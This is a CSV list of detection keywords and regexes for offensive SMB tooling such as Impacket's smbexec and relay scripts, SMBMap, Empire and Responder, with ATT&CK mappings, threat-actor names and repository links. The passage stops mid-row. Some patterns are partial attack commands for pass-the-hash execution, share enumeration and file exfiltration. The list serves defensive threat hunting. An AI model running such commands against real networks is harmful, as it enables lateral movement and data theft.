"*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *",".{0,1000}smbclient\s\\\\\\\\\\\\\\\\.{0,1000}\\\\\\\\TRANSFER\s\-N\s\-p\s.{0,1000}\s\-c\s\\.{0,1000}put\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","59681"
"*smbclient -N -A *\\\\*\\*temp_out.txt*",".{0,1000}smbclient\s\-N\s\-A\s.{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}temp_out\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","59682"
"*smbclient.getFile('C$', 'Windows/CCM/SCNotification.exe.config*",".{0,1000}smbclient\.getFile\(\'C\$\',\s\'Windows\/CCM\/SCNotification\.exe\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","59683"
"*smbcrawler*",".{0,1000}smbcrawler.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","N/A","2","161","21","2025-03-24T07:46:43Z","2021-06-09T19:27:08Z","59684"
"*SMBCrunch-master*",".{0,1000}SMBCrunch\-master.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","59685"
"*SMBeagle.exe*",".{0,1000}SMBeagle\.exe.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59686"
"*SMBeagle.sln*",".{0,1000}SMBeagle\.sln.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59687"
"*smbeagle_*_linux_amd64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","#linux","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59688"
"*smbeagle_*_linux_arm64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_arm64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","#linux","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59689"
"*smbeagle_*_win_x64.zip*",".{0,1000}smbeagle_.{0,1000}_win_x64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","59690"
"*smbenum.run*",".{0,1000}smbenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","59691"
"*SMBetray*",".{0,1000}SMBetray.{0,1000}","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","N/A","4","387","87","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z","59692"
"*-SMBExec*",".{0,1000}\-SMBExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59693"
"*smbexec.py -hashes :*",".{0,1000}smbexec\.py\s\-hashes\s\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","APT20 - Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59694"
"*smbexec.py -share*",".{0,1000}smbexec\.py\s\-share.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59695"
"*smbexec.py*",".{0,1000}smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59696"
"*SMBGhost.pcap*",".{0,1000}SMBGhost\.pcap.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","7","678","194","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z","59697"
"*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59698"
"*smblogin.results.log*",".{0,1000}smblogin\.results\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59699"
"*smblogin-spray.ps1*",".{0,1000}smblogin\-spray\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","59700"
"*smbmap -*",".{0,1000}smbmap\s\-.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59701"
"*smbmap -u guest -H *",".{0,1000}smbmap\s\-u\sguest\s\-H\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59702"
"*smbmap.py *",".{0,1000}smbmap\.py\s.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59703"
"*smbmap.smbmap*",".{0,1000}smbmap\.smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59704"
"*smbmapDump*",".{0,1000}smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59705"
"*smbmap-execute-command.txt*",".{0,1000}smbmap\-execute\-command\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59706"
"*smbmap-list-contents.txt*",".{0,1000}smbmap\-list\-contents\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59707"
"*smbmap-master*",".{0,1000}smbmap\-master.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","59708"
"*smbmap-share-permissions.txt*",".{0,1000}smbmap\-share\-permissions\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","59709"
"*SMBNTLMChallenge*",".{0,1000}SMBNTLMChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59710"
"*SMBNTLMResponse*",".{0,1000}SMBNTLMResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59711"
"*smbpasswd.py -newpass *",".{0,1000}smbpasswd\.py\s\-newpass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59712"
"*smbpasswd.py*",".{0,1000}smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59713"
"*SMBRelay.py*",".{0,1000}SMBRelay\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","59714"
"*SMBRelayChallenge*",".{0,1000}SMBRelayChallenge.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59715"
"*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","59716"
"*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59717"
"*smbrelayclient.py*",".{0,1000}smbrelayclient\.py.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","59718"
"*SMBRelayResponse*",".{0,1000}SMBRelayResponse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 